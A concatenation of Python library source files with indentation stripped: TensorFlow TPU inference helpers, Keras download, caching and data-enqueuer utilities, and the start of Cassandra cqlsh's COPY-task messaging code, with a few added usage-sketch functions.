# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture(
(estimator_spec, export_outputs_dict, predictions_dict, none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(model_fn, features, labels, config,
params):
"""Builds the TPU computation for inference on TPU."""
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
model_fn_args = function_utils.fn_args(model_fn)
kwargs = {}
# Makes a deep copy of `config` and `params` in case the user mutates them.
if 'labels' in model_fn_args:
kwargs['labels'] = labels
if 'mode' in model_fn_args:
kwargs['mode'] = model_fn_lib.ModeKeys.PREDICT
if 'config' in model_fn_args:
kwargs['config'] = config
if 'params' in model_fn_args:
kwargs['params'] = params
estimator_spec = model_fn(features, **kwargs)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = tf.nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [t for t in export_outputs_list if t is not None]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = tf.nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def inference_on_tpu(computation,
inputs_to_tpu,
num_batch_threads,
max_batch_size,
batch_timeout_micros,
allowed_batch_sizes=None,
max_enqueued_batches=100):
"""Convenient wrapper for export_saved_model API v2 to wrap TPU computation.
WARNING: THIS METHOD IS DEPRECATED AND NOT PART OF THE APIS.
Make sure to set
`export_saved_model_api_version=tpu_estimator.ExportSavedModelApiVersion.V2`
when initializing TPUEstimator (default API version is V1). This is because
1) `tpu.rewrite` (or `tpu.compile`) shouldn't be called in a nested way
(otherwise validation will throw error like
"NotImplementedError: tpu_shard_context cannot be nested.")
2) When using V1 API, Estimator calls `tpu.rewrite` so
using `inference_on_tpu` will trigger a nested call.
When using V2 API, users of Estimator need to call `tpu.rewrite` (which
the wrapper does).
It puts the computation on TPU, adds batching around it, and round-robins the
computation between TPU cores.
See tpu_estimator_test.py for an example.
Args:
computation: computation to be put on TPU, which takes inputs_to_tpu as
arguments.
inputs_to_tpu: a list of tensors as input to computation.
num_batch_threads: Number of scheduling threads for processing batches of
work. Determines the number of batches processed in parallel.
max_batch_size: Batch sizes will never be bigger than this. If None or 0,
no batching will be done.
batch_timeout_micros: Maximum number of microseconds to wait before
outputting an incomplete batch.
allowed_batch_sizes: Optional list of allowed batch sizes. If left empty,
does nothing. Otherwise, supplies a list of batch sizes, causing the op to
pad batches up to one of those sizes. The entries must increase
monotonically, and the final entry must equal max_batch_size.
max_enqueued_batches: The maximum depth of the batch queue. Defaults to 100.
Returns:
The unbatched computation output Tensors.
"""
def _tpu_call(args):
"""Function to either call or feed into BatchFunction."""
@function.Defun(capture_resource_var_by_value=False)
def tpu_computation():
"""Function to feed into the TPUPartitionedCallOp."""
tensors_on_cpu = tf.compat.v1.tpu.rewrite(computation, args)
tpu.prune_unconnected_ops_from_xla(tf.compat.v1.get_default_graph())
return tensors_on_cpu
return tpu_functional.TPUPartitionedCall(
args=tpu_computation.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_computation.definition.signature.output_arg],
f=tpu_computation)
if not max_batch_size:
return _tpu_call(inputs_to_tpu)
@tf.nondifferentiable_batch_function(num_batch_threads, max_batch_size,
batch_timeout_micros,
allowed_batch_sizes,
max_enqueued_batches)
def batched_tpu_computation(*args):
"""Function to feed into the BatchOp."""
return _tpu_call(args)
return batched_tpu_computation(*inputs_to_tpu)
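# Hedged usage sketch (illustration only): wrapping a per-batch computation with
# `inference_on_tpu`, as one might do inside a serving model_fn when the V2 export
# API is enabled. `my_tpu_computation` is a hypothetical function that takes the
# batched feature tensor and returns output tensors; the batching numbers below are
# placeholders, not recommendations.
def _example_inference_on_tpu(my_tpu_computation, features_tensor):
  """Run `my_tpu_computation` on TPU with server-side batching enabled."""
  return inference_on_tpu(
      my_tpu_computation,
      inputs_to_tpu=[features_tensor],
      num_batch_threads=1,
      max_batch_size=128,
      batch_timeout_micros=10 * 1000,  # wait at most 10ms to fill a batch
      allowed_batch_sizes=[8, 32, 128])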
|
data_utils.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=g-import-not-at-top
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from abc import abstractmethod
from contextlib import closing
import hashlib
import multiprocessing
from multiprocessing.pool import ThreadPool
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import zipfile
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
try:
import queue
except ImportError:
import Queue as queue
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
Arguments:
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
response = urlopen(url, data)
with open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def is_generator_or_sequence(x):
"""Check if `x` is a Keras generator type."""
return tf_inspect.isgenerator(x) or isinstance(x, Sequence)
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
Arguments:
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
Returns:
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format == 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type == 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type == 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError, KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
@tf_export('keras.utils.get_file')
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
Arguments:
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras
Directory](/faq/#where-is-the-keras-configuration-file-stored).
Returns:
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' + file_hash +
' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size == -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
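# Hedged usage sketch (illustration only): downloading and caching an archive with
# sha256 verification. The URL and digest below are hypothetical placeholders, not
# real artifacts.
def _example_get_file_usage():
  """Download example.tar.gz into ~/.keras/datasets, verify it, and extract it."""
  return get_file(
      fname='example.tar.gz',
      origin='https://example.com/example.tar.gz',  # hypothetical URL
      file_hash='0' * 64,  # hypothetical sha256 digest; mismatch forces re-download
      hash_algorithm='sha256',
      extract=True,
      cache_subdir='datasets')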
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
Example:
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
Arguments:
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
The file hash
"""
if (algorithm == 'sha256') or (algorithm == 'auto'):  # no reference digest to inspect here, so 'auto' defaults to sha256
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
Arguments:
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
Returns:
Whether the file is valid
"""
if (algorithm == 'sha256') or (algorithm == 'auto' and len(file_hash) == 64):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
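# Hedged usage sketch (illustration only): `_hash_file` computes a digest and
# `validate_file` compares a file against an expected digest; with a 64-character
# hex string, `algorithm='auto'` resolves to sha256.
def _example_validate_file_usage(fpath):
  """Return True if `fpath` matches its own freshly computed sha256 digest."""
  digest = _hash_file(fpath, algorithm='sha256')  # 64-char hex string
  return validate_file(fpath, digest, algorithm='auto')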
@tf_export('keras.utils.Sequence')
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implement the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement
`on_epoch_end`.
The method `__getitem__` should return a complete batch.
Notes:
`Sequence` is a safer way to do multiprocessing. This structure guarantees
that the network will only train once
on each sample per epoch, which is not the case with generators.
Examples:
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
import math
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return math.ceil(len(self.x) / self.batch_size)
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) *
self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) *
self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
Arguments:
index: position of the batch in the Sequence.
Returns:
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
Returns:
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create a generator that iterate over the Sequence."""
for item in (self[i] for i in range(len(self))):
yield item
def iter_sequence_infinite(seq):
"""Iterates indefinitely over a Sequence.
Arguments:
seq: Sequence instance.
Yields:
Batches of data from the Sequence.
"""
while True:
for item in seq:
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
Arguments:
uid: int, Sequence identifier
i: index
Returns:
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
@tf_export('keras.utils.SequenceEnqueuer')
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
Example:
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of data.
"""
def __init__(self, sequence,
use_multiprocessing=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
Arguments:
workers: Number of workers.
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = self._get_executor_init(workers)
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _send_sequence(self):
"""Sends current Iterable to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
Arguments:
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
@abstractmethod
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
raise NotImplementedError
@abstractmethod
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Arguments:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
@tf_export('keras.utils.OrderedEnqueuer')
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
Arguments:
sequence: A `tf.keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence, use_multiprocessing=False, shuffle=False):
super(OrderedEnqueuer, self).__init__(sequence, use_multiprocessing)
self.shuffle = shuffle
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Arguments:
workers: Number of workers.
Returns:
Function, a Function to initialize the pool
"""
def pool_fn(seqs):
return multiprocessing.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs,))  # OrderedEnqueuer has no random_seed attribute; init_pool_generator defaults it to None
return pool_fn
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception: # pylint: disable=broad-except
self.stop()
six.reraise(*sys.exc_info())
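# Hedged usage sketch (illustration only): pulling a fixed number of batches from
# an OrderedEnqueuer. `my_sequence` stands for any concrete Sequence subclass, such
# as the CIFAR10Sequence example in the Sequence docstring above.
def _example_ordered_enqueuer_usage(my_sequence, steps=10):
  """Pull `steps` batches from `my_sequence` using two worker threads."""
  enqueuer = OrderedEnqueuer(my_sequence, use_multiprocessing=False, shuffle=False)
  enqueuer.start(workers=2, max_queue_size=10)
  batches = []
  try:
    gen = enqueuer.get()  # infinite generator over the Sequence, epoch after epoch
    for _ in range(steps):
      batches.append(next(gen))
  finally:
    enqueuer.stop()
  return batches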
def init_pool_generator(gens, random_seed=None):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = gens
if random_seed is not None:
ident = multiprocessing.current_process().ident
np.random.seed(random_seed + ident)
def next_sample(uid):
"""Gets the next value from the generator `uid`.
To allow multiple generators to be used at the same time, we use `uid` to
get a specific one. A single generator would cause the validation to
overwrite the training generator.
Arguments:
uid: int, generator identifier
Returns:
The next value of generator `uid`.
"""
return six.next(_SHARED_SEQUENCES[uid])
@tf_export('keras.utils.GeneratorEnqueuer')
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
Arguments:
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, sequence,
use_multiprocessing=False,
random_seed=None):
super(GeneratorEnqueuer, self).__init__(sequence, use_multiprocessing)
self.random_seed = random_seed
def _get_executor_init(self, workers):
"""Gets the Pool initializer for multiprocessing.
Arguments:
workers: Number of workers.
Returns:
A Function to initialize the pool
"""
def pool_fn(seqs):
return multiprocessing.Pool(workers,
initializer=init_pool_generator,
initargs=(seqs, self.random_seed))
return pool_fn
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
self._send_sequence() # Share the initial generator
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
while True:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(next_sample, (self.uid,)), block=True)
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
Yields:
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except StopIteration:
# Special case for finite generators
last_ones = []
while self.queue.qsize() > 0:
last_ones.append(self.queue.get(block=True))
# Wait for them to complete
for f in last_ones:
f.wait()
# Keep the good ones
last_ones = [future.get() for future in last_ones if future.successful()]
for inputs in last_ones:
if inputs is not None:
yield inputs
except Exception as e: # pylint: disable=broad-except
self.stop()
if 'generator already executing' in str(e):
raise RuntimeError(
'Your generator is NOT thread-safe. '
'Keras requires a thread-safe generator when '
'`use_multiprocessing=False, workers > 1`. ')
six.reraise(*sys.exc_info())
|
copyutil.py
|
# cython: profile=True
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import unicode_literals
import csv
import datetime
import json
import glob
import multiprocessing as mp
import os
import platform
import psutil
import random
import re
import signal
import six
import struct
import sys
import threading
import time
import traceback
from bisect import bisect_right
from calendar import timegm
from collections import defaultdict, namedtuple
from decimal import Decimal
from random import randint
from io import BytesIO, StringIO
from select import select
from uuid import UUID
from six import ensure_str, ensure_text
from six.moves import configparser
from six.moves import range
from six.moves.queue import Queue
from cassandra import OperationTimedOut
from cassandra.cluster import Cluster, DefaultConnection
from cassandra.cqltypes import ReversedType, UserType, BytesType, VarcharType
from cassandra.metadata import protect_name, protect_names, protect_value
from cassandra.policies import RetryPolicy, WhiteListRoundRobinPolicy, DCAwareRoundRobinPolicy, FallthroughRetryPolicy
from cassandra.query import BatchStatement, BatchType, SimpleStatement, tuple_factory
from cassandra.util import Date, Time
from cqlshlib.util import profile_on, profile_off
from cqlshlib.cql3handling import CqlRuleSet
from cqlshlib.displaying import NO_COLOR_MAP
from cqlshlib.formatting import format_value_default, CqlType, DateTimeFormat, EMPTY, get_formatter, BlobType
from cqlshlib.sslhandling import ssl_settings
PROFILE_ON = False
STRACE_ON = False
DEBUG = False # This may be set to True when initializing the task
IS_LINUX = platform.system() == 'Linux'
CopyOptions = namedtuple('CopyOptions', 'copy dialect unrecognized')
def safe_normpath(fname):
"""
:return: the normalized path, but only if there is a filename; we don't want to convert
an empty string (which means no file name) to a dot. Also expands any user variables such as ~ to the full path.
"""
return os.path.normpath(os.path.expanduser(fname)) if fname else fname
def printdebugmsg(msg):
if DEBUG:
printmsg(msg)
def printmsg(msg, eol='\n', encoding='utf8'):
sys.stdout.write(msg)
sys.stdout.write(eol)
sys.stdout.flush()
# Keep arguments in sync with printmsg
def swallowmsg(msg, eol='', encoding=''):
pass
class OneWayPipe(object):
"""
A one way pipe protected by two process level locks, one for reading and one for writing.
"""
def __init__(self):
self.reader, self.writer = mp.Pipe(duplex=False)
self.rlock = mp.Lock()
self.wlock = mp.Lock()
def send(self, obj):
with self.wlock:
self.writer.send(obj)
def recv(self):
with self.rlock:
return self.reader.recv()
def close(self):
self.reader.close()
self.writer.close()
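# Hedged usage sketch (illustration only): round-tripping a single object through a
# OneWayPipe. In the real copy tasks the writer end lives in one process and the
# reader end in another; a single-process round trip is shown here only to
# illustrate the send/recv API.
def _example_one_way_pipe_usage():
    """Send one small object through a OneWayPipe and read it back."""
    pipe = OneWayPipe()
    pipe.send({'status': 'ok'})  # writer end, guarded by the write lock
    msg = pipe.recv()            # reader end, guarded by the read lock
    pipe.close()
    return msg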
class ReceivingChannel(object):
"""
A one way channel that wraps a pipe to receive messages.
"""
def __init__(self, pipe):
self.pipe = pipe
def recv(self):
return self.pipe.recv()
def close(self):
self.pipe.close()
class SendingChannel(object):
"""
A one way channel that wraps a pipe and provides a feeding thread to send messages asynchronously.
"""
def __init__(self, pipe):
self.pipe = pipe
self.pending_messages = Queue()
def feed():
while True:
try:
msg = self.pending_messages.get()
self.pipe.send(msg)
except Exception as e:
printmsg('%s: %s' % (e.__class__.__name__, e.message if hasattr(e, 'message') else str(e)))
feeding_thread = threading.Thread(target=feed)
feeding_thread.setDaemon(True)
feeding_thread.start()
def send(self, obj):
self.pending_messages.put(obj)
def num_pending(self):
return self.pending_messages.qsize() if self.pending_messages else 0
def close(self):
self.pipe.close()
class SendingChannels(object):
"""
A group of one way channels for sending messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [SendingChannel(p) for p in self.pipes]
self.num_channels = num_channels
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class ReceivingChannels(object):
"""
A group of one way channels for receiving messages.
"""
def __init__(self, num_channels):
self.pipes = [OneWayPipe() for _ in range(num_channels)]
self.channels = [ReceivingChannel(p) for p in self.pipes]
self._readers = [p.reader for p in self.pipes]
self._rlocks = [p.rlock for p in self.pipes]
self._rlocks_by_readers = dict([(p.reader, p.rlock) for p in self.pipes])
self.num_channels = num_channels
self.recv = self.recv_select if IS_LINUX else self.recv_polling
def recv_select(self, timeout):
"""
Implementation of the recv method for Linux, where select is available. Receive an object from
all pipes that are ready for reading without blocking.
"""
readable, _, _ = select(self._readers, [], [], timeout)
for r in readable:
with self._rlocks_by_readers[r]:
try:
yield r.recv()
except EOFError:
continue
def recv_polling(self, timeout):
"""
Implementation of the recv method for platforms where select() is not available for pipes.
We poll on all of the readers with a very small timeout. We stop once the specified timeout
has elapsed, but we may exceed it since we check all readers during each sweep.
"""
start = time.time()
while True:
for i, r in enumerate(self._readers):
with self._rlocks[i]:
if r.poll(0.000000001):
try:
yield r.recv()
except EOFError:
continue
if time.time() - start > timeout:
break
def close(self):
for ch in self.channels:
try:
ch.close()
except Exception:
pass
class CopyTask(object):
"""
A base class for ImportTask and ExportTask
"""
def __init__(self, shell, ks, table, columns, fname, opts, protocol_version, config_file, direction):
self.shell = shell
self.ks = ks
self.table = table
self.table_meta = self.shell.get_table_meta(self.ks, self.table)
self.host = shell.conn.get_control_connection_host()
self.fname = safe_normpath(fname)
self.protocol_version = protocol_version
self.config_file = config_file
# if cqlsh is invoked with --debug then set the global debug flag to True
if shell.debug:
global DEBUG
DEBUG = True
# do not display messages when exporting to STDOUT unless --debug is set
self.printmsg = printmsg if self.fname is not None or direction == 'from' or DEBUG \
else swallowmsg
self.options = self.parse_options(opts, direction)
self.num_processes = self.options.copy['numprocesses']
self.encoding = self.options.copy['encoding']
self.printmsg('Using %d child processes' % (self.num_processes,))
if direction == 'from':
self.num_processes += 1 # add the feeder process
self.processes = []
self.inmsg = ReceivingChannels(self.num_processes)
self.outmsg = SendingChannels(self.num_processes)
self.columns = CopyTask.get_columns(shell, ks, table, columns)
self.time_start = time.time()
def maybe_read_config_file(self, opts, direction):
